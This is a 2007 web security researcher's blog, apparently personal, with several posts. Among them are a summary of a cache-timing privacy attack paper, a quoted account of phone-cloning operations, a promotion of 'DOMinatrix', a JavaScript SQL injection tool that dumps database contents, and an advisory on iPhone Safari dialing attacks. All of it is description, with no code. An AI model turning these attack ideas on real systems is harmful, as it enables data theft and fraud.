| |
| Current Topic: Technology |
|
|
|---|
| Topic: Technology |
6:58 pm EDT, Aug 15, 2007 |
Jill out of town for work... Check
1.75L Grey Goose... Check
12 Pack Dr. Pepper... Check
Visual Studio 2005 Team Edition... Check
EMCAScript Standard 3rd Edition... Check
Rhino Book... Check
Purple Book... Check
Working from home tomorrow... Check
Nidhi's super secret static analysis code... Check Can I write a recursive descent JavaScript parser before tomorrow afternoon? Let's find out. |
|
Timing attacks on web privacy |
|
|
|---|
| Topic: Technology |
9:06 pm EDT, Aug 10, 2007 |
Ed Felton is a genius. In this paper he discusses using timing between HTTP requests to determine whether certain URLs have been cached in a user machine. He extends this to detecting secondary cache hist to determine if two arbitrary machines are on the same network subnet. He discuss doing this both with and without JavaScript. Yes, essentially, Ed Felton published Grossman's and RSnake's Black Hat presentation 7 years before they did. Long ago RSnake claimed I stole his research and suggested I edit my paper to reflect that someone else has done work in this area. It will be interesting to see whether RSnake is willing to do that when confronted with the same situation. What's the phrase? Put up or shut up? Of course, I've never seen Grossman or RSnake reference Ed Felton's work in any of their presentations. Was it willing omitted? If not, how could they not be aware of it if they did any type of due diligence for their research? It's not like Edward Felton is some obscure person in the security space. Some of his work was required reading in a class I took as a sophomore in college. Update Ahh the Drama... Timing attacks on web privacy |
|
Cloning western technology, and getting a better result! |
|
|
|---|
| Topic: Technology |
10:12 am EDT, Aug 10, 2007 |
How to Clone Anything
The easiest way to clone a product is to use a "ghost shift": A factory contracted to make legitimate goods moves to 24-hour operation, churning out copies—some made with inferior materials, and others exactly the same, designed to be sold on the black market—from midnight to morning. The only problem with ghost shifts is that they can't run full time. In the mid-'90s, developers began constructed from the same blueprints legitimate manufacturers used to launch their ventures. Sometimes the plans were sold by managers at the genuine facilities. Other times, local officials and organized crime conspired to create a second set of blueprints. Cloners look for opportunity first, and manufacturers often give it to them, often in the form of a hot product that is released in a limited number of markets. Desire spreads worldwide, and the cloners are ready to fill any gaps that emerge in supply or distribution. (That's what's happening now with the iPhone, which for nearly a year will be sold in North America only.) The cloners start by deciding what phones would be most profitable to clone. They then learn everything they can about the device. They attend trade shows, furiously snapping photos of not-yet-released products until someone notices and shoos them away. They will be first in line to buy the new product whenever it hits stores. And they will look for shortcuts, such as a patent filed in China that can act as the beginning of an actual production guide. The cloners hire a team of between 20 and 40 engineers to begin decoding the circuit boards. At the same time, coders start to develop an operating system for the phone with a similar feature set. (The typical cloner either uses off-the-shelf code, writes something entirely new, or modifies a publicly available Linux-based system.) Both processes take about a month. By then, ancillary items—plastic casings, accessories, manuals and packaging—are ready as well. Full production begins at another factory, one that is already building phones, within about eight weeks from the time the engineers are hired. After a run of about 30,000 units, the cloners move the operation to a new facility in order to avoid detection.
This is a fascinating read! Cloning western technology, and getting a better result! |
|
Securing Ajax Applications |
|
|
|---|
| Topic: Technology |
9:21 am EDT, Aug 7, 2007 |
There is a reason this book's animal is a laughing hyena. Unfortunately, the joke's on you. |
|
|
|---|
| Topic: Technology |
4:08 am EDT, Aug 2, 2007 |
This is the end
Beautiful friend
This is the end
My only friend, the end Of our elaborate plans, the end
Of everything that stands, the end
No safety or surprise, the end
We gave it a great send off over the last few days. Many drinks. Many toasts. To those who aren't here, but who got us here. To those that did without to build something great. But all good things come to an end. And now it's gone. Remember Mantra #2 Make it work. Then make it great. Then take it live. Then change the world. Then make your money. Then make it free. Then start again.
|
|
DOMinatrix - The JavaScript SQL Injector |
|
|
|---|
| Topic: Technology |
2:05 am EDT, Jul 26, 2007 |
DOMinatrix is, well, incredibly awesome. It's a full automated SQL Injection tool written in JavaScript, which will dump out data from MS SQL Server databases (more to come). I'm be demoing DOMinatrix at my Black Hat presentation. XSS + Web worm + DOMinatrix = oh crap. In the last 5 months we've seen the development of web scanners and SQL injectors in JavaScript. These aren't a browser exploits.
These aren't buffer overflows.
These aren't something that affects only a single browser and only on pages that don't explicitly set a character set. This is using JavaScript in perfectly valid ways to do extremely malicious things. There is no way to patch this.
End users are pretty much screwed. Here is a screen shot of DOMinatrix in action. |
|
|
|---|
| Topic: Technology |
2:31 pm EDT, Jul 23, 2007 |
Billy, I submitted your title to the Conference Advisory Board and we were hoping you could possibly re-phrase the “Premature AJAX-ulation” references. While some of us appreciate the play on words, we have a feeling it would not be well received by all and we do not wish to offend anyone.
|
|
The SPI laboratory : SPI Labs advises avoiding iPhone feature |
|
|
|---|
| Topic: Technology |
11:39 am EDT, Jul 17, 2007 |
The Apple iPhone’s Safari web browser has a special feature that allows the user to dial any phone number displayed on a web page simply by tapping the number. SPI Labs has discovered that this feature can be exploited by attackers to perform various attacks, including: * Redirecting phone calls placed by the user to different phone numbers of the attacker’s choosing
* Tracking phone calls placed by the user
* Manipulating the phone to place a call without the user accepting the confirmation dialog
* Placing the phone into an infinite loop of attempting calls, through which the only escape is to turn off the phone
* Preventing the phone from dialing These types of attacks can be launched from a malicious website, from a legitimate website that has Cross-Site Scripting vulnerabilities, or as part of a payload of a web application worm. For example, an attacker could determine that a specific website visitor “Bob” has called an embarrassing number such as an escort service. An attacker can also trick or force Bob into dialing any other telephone number without his consent such a 900-number owned by the attacker or an international number. Finally, an attacker can lock Bob’s phone forcing Bob to either make the call or hard-reset his phone resulting in possible data loss.
Told you it would mention an escort service. The SPI laboratory : SPI Labs advises avoiding iPhone feature |
|
